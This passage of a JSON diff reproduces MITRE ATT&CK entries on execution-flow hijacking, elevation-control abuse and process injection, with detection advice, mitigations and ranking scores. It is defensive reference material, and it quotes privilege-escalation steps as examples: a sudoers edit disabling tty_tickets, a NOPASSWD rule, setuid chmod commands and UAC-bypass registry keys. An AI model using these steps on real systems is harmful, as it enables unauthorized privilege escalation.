"description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1574.006", + "name": "Hijack Execution Flow: Dynamic Linker Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage Dynamic Linker Hijacking to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ", + "url": "https://attack.mitre.org/techniques/T1574/006", + "detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1574.007", + "name": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.", + "url": "https://attack.mitre.org/techniques/T1574/007", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1574.008", + "name": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.", + "url": "https://attack.mitre.org/techniques/T1574/008", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1574.009", + "name": "Hijack Execution Flow: Path Interception by Unquoted Path", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", + "url": "https://attack.mitre.org/techniques/T1574/009", + "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1574.010", + "name": "Hijack Execution Flow: Services File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "url": "https://attack.mitre.org/techniques/T1574/010", + "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1574.011", + "name": "Hijack Execution Flow: Services Registry Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", + "url": "https://attack.mitre.org/techniques/T1574/011", + "detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1574.012", + "name": "Hijack Execution Flow: COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a Component Object Model (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: Bypass User Account Control) if the victim .NET process executes at a higher permission level, as well as to hook and Impair Defenses provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "url": "https://attack.mitre.org/techniques/T1574/012", + "detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and Reg, monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ] + }, + { + "rank": 9, + "tid": "T1548", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.", + "url": "https://attack.mitre.org/techniques/T1548", + "detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of Process Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.", + "score": 2.1190755531819048, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "subtechniques": [ + { + "tid": "T1548.001", + "name": "Abuse Elevation Control Mechanism: Setuid and Setgid", + "description": "An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).", + "url": "https://attack.mitre.org/techniques/T1548/001", + "detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Account Control", + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n
    \n
  • eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
    • \n
\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", + "url": "https://attack.mitre.org/techniques/T1548/002", + "detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of Process Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n
    \n
  • \nThe eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n
    • \n
  • \nThe sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n
    • \n
\nAnalysts should monitor these Registry settings for unauthorized changes.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1548.003", + "name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "url": "https://attack.mitre.org/techniques/T1548/003", + "detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1548.004", + "name": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "url": "https://attack.mitre.org/techniques/T1548/004", + "detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ] + }, + { + "rank": 10, + "tid": "T1055", + "name": "Process Injection", + "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", + "url": "https://attack.mitre.org/techniques/T1055", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "score": 2.0690476190476192, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "subtechniques": [ + { + 